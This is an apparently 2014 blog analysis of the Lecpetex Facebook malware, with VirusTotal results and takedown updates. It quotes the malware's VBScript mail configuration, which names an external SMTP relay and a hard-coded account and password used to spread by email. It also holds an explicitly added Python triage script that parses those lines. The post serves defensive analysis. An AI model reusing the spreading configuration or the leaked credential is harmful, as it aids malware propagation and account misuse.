[en] Virus Facebook hahaha (Lecpetex)

Some threads about a "Virus Facebook hahaha" these last days.
It seems some people got a private message with a zip file.


I don't have the main zip sent by Facebook, but someone sent me another zip related to this virus.
It's an interesting VBE script:

The VBE downloads a zip from Dropbox and creates a Temp directory to store the files.
It registers a DLL that is a Bitcoin miner: https://www.virustotal.com/fr/file/a775ad50757a3de35a3445fb6594cb4b5bc5ec4db34d63ec6b8bf852b6472d0b/analysis/

SHA256: a775ad50757a3de35a3445fb6594cb4b5bc5ec4db34d63ec6b8bf852b6472d0b
File name: xml.exfffe
Detection ratio: 10 / 53
Analysis date: 2014-06-10 22:16:20 UTC (29 minutes ago)

Ad-Aware Gen:Variant.Graftor.143340 20140610
AntiVir TR/Dropper.Gen 20140610
Avast Win32:Miner-B [PUP] 20140610
BitDefender Gen:Variant.Graftor.143340 20140610
ESET-NOD32 a variant of Win32/Injector.BEIE 20140610
Emsisoft Gen:Variant.Graftor.143340 (B) 20140610
F-Secure Gen:Variant.Graftor.143340 20140610
GData Gen:Variant.Graftor.143340 20140610
MicroWorld-eScan Gen:Variant.Graftor.143340 20140610
Symantec Suspicious.AD 20140610

The VBE is also able to use external utilities like ClickYes (maybe modified: https://www.virustotal.com/fr/file/618232771f97ded754fe06e0be4f47b8c1b13ca9030ef01774176791f354447b/analysis/ ) to get the Outlook contact list and spread by email.
To do that, it uses a Greek SMTP server:

' CDO message configuration fields found in the script. sendusing = 2 (cdoSendUsingPort): send over the network through the SMTP relay below
.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "mailgate.otenet.gr"
.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 587
.Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False
.Item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60
' smtpauthenticate = 1 (cdoBasic): log in with the hard-coded account below, in clear text since SSL is off
.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "[email protected]"
.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "nat1978#"

Interesting!
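As an added triage helper (not code from the original post or from the malware), a small Python script that pulls the CDO configuration items out of a decoded VBScript sample and lists the indicators a responder would record: the hard-coded external SMTP relay, the embedded account, and the fact that it authenticates without TLS. The sample input is the snippet above, with the page's redacted address kept as-is.

```python
import re

# Constructed sample: the CDO lines quoted above, as they read once the .vbe is decoded; address kept redacted as on the page.
SAMPLE = r'''
.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "mailgate.otenet.gr"
.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 587
.Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False
.Item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60
.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "[email protected]"
.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "nat1978#"
'''

# Matches one CDO field assignment and captures the short key and the raw right-hand side.
CDO_ITEM = re.compile(
    r'\.Item\("http://schemas\.microsoft\.com/cdo/configuration/(\w+)"\)\s*=\s*(.+)')

def _coerce(raw):
    """Turn the VBScript literal on the right-hand side into a Python value."""
    raw = raw.strip()
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    if raw in ("True", "False"):
        return raw == "True"
    if raw.isdigit():
        return int(raw)
    return raw  # a variable name or expression is kept verbatim

def parse_cdo_config(script_text):
    """Return {key: value} for every CDO configuration item found in the script."""
    return {key: _coerce(val) for key, val in CDO_ITEM.findall(script_text)}

def triage(fields):
    """List the defender-relevant indicators derived from the parsed fields."""
    findings = []
    if fields.get("sendusing") == 2:  # cdoSendUsingPort: mail leaves over the network
        findings.append("sends mail directly over SMTP (sendusing=2)")
    if "smtpserver" in fields:
        port = fields.get("smtpserverport", 25)  # CDO defaults to 25 when unset
        findings.append(f"hard-coded relay: {fields['smtpserver']}:{port}")
    if fields.get("smtpauthenticate") == 1 and "sendpassword" in fields:
        findings.append(f"embedded SMTP credentials for {fields.get('sendusername')}")
        if fields.get("smtpusessl") is False:
            findings.append("credentials sent without TLS (smtpusessl=False)")
    return findings

if __name__ == "__main__":
    print("\n".join(triage(parse_cdo_config(SAMPLE))))
```

The relay host, port and account it prints are what you would add to a block list or hunt for in proxy and mail-gateway logs.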

I will try to get the zip file sent on Facebook; if it is different, I will edit this thread.

EDIT - June 12

Facebook malicious spam example:

(screenshots: Virus #1, Virus #2)

Also, someone sent me this article (in French): http://forum.security-x.fr/securite-generale/vague-de-spams-malicieux-sur-facebook/
There is a sample, but a bit old: first submission 2014-05-28 15:43:35 UTC (2 weeks ago) => https://www.virustotal.com/fr/file/4bcb865060ec401b2ed1d20422ed00488e04884f9abd573ca9d41d666b1fe7fc/analysis/1402529232/
The Jar tries to download a zip from Dropbox (maybe the same VBE script was there), but Dropbox has already removed everything.

It also seems that Malwarebytes has already blogged about it: http://blog.malwarebytes.org/security-threat/2014/03/malicious-messages-foray-facebook/


EDIT - June 23

Another article about this threat: http://thegoldenmessenger.blogspot.de/2014/06/malware-spread-over-facebook.html
According to the article, Microsoft detects the Jar under the name Java/Carastavona.E

EDIT - July 9 - Facebook takes down Lecpetex Botnet

Facebook takes down the Lecpetex botnet - more information: https://www.facebook.com/notes/protect-the-graph/taking-down-the-lecpetex-botnet/1477464749160338

This article is licensed under Creative Commons BY-NC-SA.
You may share and modify this article, provided you credit the site and the license, use the same license if you modify the work, and do not make commercial use of it.
